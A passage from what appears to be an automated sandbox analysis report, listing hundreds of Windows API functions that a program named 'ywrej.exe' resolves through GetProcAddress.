QueryPerformanceFrequency (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MulDiv (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LockResource (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalUnlock (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalLock (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalFree (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalFindAtomW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalDeleteAtom (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GlobalAddAtomW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThreadPriority (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDateFormatW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCPInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FreeResource (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InterlockedExchangeAdd (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InterlockedCompareExchange (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumCalendarInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CompareStringW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter lstrcpynW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsValidLocale (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultUILanguage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCommandLineW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter UnhandledExceptionFilter (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegUnLoadKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegSaveKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegRestoreKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegReplaceKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegLoadKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegFlushKey (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegDeleteKeyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RegConnectRegistryW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter _TrackMouseEvent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_GetImageInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_SetIconSize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_GetIconSize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Write (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Read (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_GetDragImage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_DragShowNolock (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_DragMove (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_DragLeave (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_DragEnter (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_EndDrag (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_BeginDrag (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Copy (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_LoadImageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_GetIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Remove (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_DrawEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Replace (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Draw (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_SetOverlayImage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_GetBkColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_SetBkColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_ReplaceIcon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Add (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_SetImageCount (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_GetImageCount (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Destroy (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ImageList_Create (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetOpenFileNameW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter UnrealizeObject (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter StretchDIBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter StretchBlt (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter StartPage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter StartDocW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowOrgEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWinMetaFileBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetViewportOrgEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetTextColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetStretchBltMode (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetROP2 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetPixel (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetMapMode (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetEnhMetaFileBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetDIBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetDIBColorTable (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetBrushOrgEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetBkMode (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetBkColor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetAbortProc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SelectPalette (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SelectObject (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SelectClipRgn (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SaveDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RoundRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RestoreDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Rectangle (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RectVisible (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RealizePalette (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Polyline (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Polygon (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PolyBezierTo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PolyBezier (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PlayEnhMetaFile (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Pie (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter PatBlt (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MoveToEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter MaskBlt (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LineTo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IntersectClipRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWindowOrgEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetWinMetaFileBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTextMetricsW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTextExtentPoint32W (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemPaletteEntries (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetRgnBox (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetPixel (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetPaletteEntries (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetObjectW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFilePaletteEntries (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileHeader (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileDescriptionW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDIBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDIBColorTable (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetDCOrgEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentPositionEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetClipBox (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetBrushOrgEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetBitmapBits (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GdiFlush (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FrameRgn (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ExtTextOutW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ExtFloodFill (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ExcludeClipRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumFontsW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EnumFontFamiliesExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EndPage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter EndDoc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Ellipse (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DeleteObject (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DeleteEnhMetaFile (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter DeleteDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateSolidBrush (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateRectRgn (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreatePenIndirect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreatePalette (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateICW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateHalftonePalette (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateFontIndirectW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateDIBitmap (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateDIBSection (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateDCW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleDC (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateBrushIndirect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateBitmap (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CopyEnhMetaFileW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Chord (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter BitBlt (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Arc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AbortDoc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AlphaBlend (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CLSIDFromString (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter StringFromCLSID (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter IsEqualGUID (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayPtrOfIndex (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayPutElement (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetElement (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayUnaccessData (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayAccessData (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetUBound (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetLBound (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SafeArrayCreate (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VariantChangeType (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VariantCopyInd (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VariantCopy (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VariantClear (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VariantInit (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetErrorInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SysFreeString (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SysReAllocStringLen (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SysAllocStringLen (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WindowFromPoint (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WaitMessage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter UpdateWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter UnregisterClassW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter UnhookWindowsHookEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TranslateMDISysAccel (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TrackPopupMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ShowScrollBar (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ShowOwnedPopups (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowsHookExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowTextW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowPlacement (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetScrollRange (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetScrollPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetScrollInfo (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetRect (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetPropW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetParent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetMenuItemInfoW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetMenu (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetForegroundWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetFocus (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetCursorPos (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetCursor (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetClassLongW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetCapture (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetActiveWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SendMessageW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ScrollWindow (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ScreenToClient (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RemovePropW (UID: 00000000-00001924)\n \"ywrej.exe\" called 